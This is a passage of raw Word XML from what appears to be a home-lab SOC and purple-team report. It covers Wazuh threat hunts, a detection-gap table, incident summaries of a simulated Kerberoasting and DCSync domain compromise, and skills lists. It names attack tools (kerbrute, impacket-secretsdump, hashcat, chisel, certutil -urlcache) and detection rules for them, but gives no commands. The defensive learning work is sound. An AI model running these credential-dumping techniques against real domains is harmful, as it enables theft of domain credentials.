      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">T1003.006 - OS Credential Dumping: DCSync</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">T1550.002 - Use Alternate Authentication Material: Pass the Hash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">T1090.001 - Proxy: Internal Proxy (chisel)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">T1105 - Ingress Tool Transfer (certutil)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">T1078.002 - Valid Accounts: Domain Accounts</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Threat Hunting Section</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Beyond alert-driven detection, three proactive threat hunts were conducted against accumulated Wazuh telemetry to demonstrate mature SOC methodology.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.1 Hunt 1 - Post-Brute-Force Successful Authentication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hypothesis: Following a brute force attack, a successful authentication from the same attacker IP indicates credential compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Query: data.win.system.eventID: "4624" and data.win.eventdata.ipAddress: "10.10.10.60"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Result: Hits found. Correlated with prior 4625 events from the same source, confirming Kali did establish successful authenticated sessions on HQ-STAFF-01 during Use Case 2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.2 Hunt 2 - Kerberoasting Fingerprint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hypothesis: Kerberoasting is characterized by TGS-REQ (Event ID 4769) events for SPN-enabled accounts. High volume from single source indicates enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Query: data.win.system.eventID: "4769"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Result: Hits found from Use Case 3 Kerberoasting phase. Demonstrates that the raw data exists in Wazuh - a custom correlation rule could turn this into a first-class detection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.3 Hunt 3 - Domain Admins Group Modifications</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hypothesis: Any modification to Domain Admins group membership is high-risk and worth investigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Query: rule.description: "Domain Admins Group Changed" or data.win.system.eventID: "4728"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Result: Hit found from Use Case 3 demonstration where hqSaacid was added to Domain Admins. Wazuh caught the change in real time.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. Detection Gaps Identified</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Honest documentation of detection gaps is as valuable as documentation of successful detections - both drive the SOC engineering roadmap. The following gaps were identified during Month 2 and are recommended for future engineering work.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00"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2500"/>
            <w:shd w:fill="1F3864" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Gap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="1F3864" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3500"/>
            <w:shd w:fill="1F3864" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Recommended Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Kerberoasting not detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">High-privilege service accounts silently compromised</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Custom rule: &gt;3 unique SPN 4769 requests from single source in 60s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">DCSync not detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Full domain hash dump goes unnoticed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Custom rule: Event 4662 with replication GUID 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Chisel/SOCKS pivot not detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker C2 tunnels undetected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Sysmon Event 3 (network connection) rules for outbound long-lived connections from user context</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">LOLBin usage (certutil download) not detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">File transfer via legitimate binary goes unnoticed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Sysmon Event 1 rule for certutil.exe with -urlcache flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Anonymous SMB session not detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Reconnaissance phase invisible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Custom rule for Event 5140 with 'ANONYMOUS LOGON' user</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Share name enumeration not detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Multiple failed share access attempts not correlated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Custom rule: &gt;5 failed share connections from single source in 60s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Intra-subnet port scan not detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Same-subnet reconnaissance invisible to pfSense</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Sysmon Event 3 on endpoints OR deploy Suricata network sensor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass-the-hash indistinguishable from NTLM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Credential replay looks like normal auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Deploy Defender for Identity or equivalent AD attack detection tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9. Incident Reports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Three formal Incident Reports were produced documenting the Month 2 attack simulations. Each is delivered as a standalone document and summarized here:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.1 IR-2026-001 - Brute Force Attack Against Domain Controller</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Severity: HIGH (Level 10)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Status: CLOSED - CONTAINED (Automated Response)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Source: 10.10.10.60 -&gt; Target: DC1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detection: Rules 60104, 60205, 60115</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Response: Wazuh Active Response deployed firewall block via netsh in &lt;6 seconds</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.2 IR-2026-002 - Anonymous SMB Share Data Exposure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Severity: HIGH (Level 10)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Status: CLOSED - CONTAINED (Post-Remediation)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Source: 10.10.10.60 -&gt; Target: HQ-STAFF-01</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detection: Rules 60106, 92657 (post-authentication only)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Root Cause: Anonymous SMB access + plaintext credentials in file share</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.3 IR-2026-003 - Domain Compromise via Kerberoasting and DCSync</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Severity: CRITICAL (Level 15)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Status: CLOSED - Full Domain Rebuild Recommended</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Source: 10.10.10.60 (via HQ-STAFF-01 pivot) -&gt; Target: DC1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detection: Only rule 92657 (partial)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Impact: Total domain compromise, krbtgt hash exposed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remediation: krbtgt reset twice with 10hr interval, domain-wide password reset, DCSync rights audit</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10. Skills &amp; Technical Competencies Developed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.1 Detection Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Windows advanced audit policy configuration (auditpol)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wazuh custom decoder development (PCRE2 regex)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wazuh custom rule development (correlation rules with same_srcip, frequency, timeframe)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Log source onboarding (Windows EventChannel, pfSense syslog)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Threat intelligence enrichment (VirusTotal integration)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dashboard and visualization engineering (OpenSearch Dashboards)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.2 Incident Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Automated containment via Wazuh Active Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">End-to-end response chain validation (alert -&gt; command dispatch -&gt; agent execution -&gt; confirmation)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Formal incident reporting following industry structure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Root cause analysis and remediation planning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MITRE ATT&amp;CK technique mapping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.3 Offensive Security (Purple Team)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kerberos-based attacks: kerbrute userenum, passwordspray, bruteuser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SMB reconnaissance and lateral movement: netexec, smbclient, impacket</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kerberoasting: impacket-GetUserSPNs, hashcat offline cracking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DCSync attack: impacket-secretsdump</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
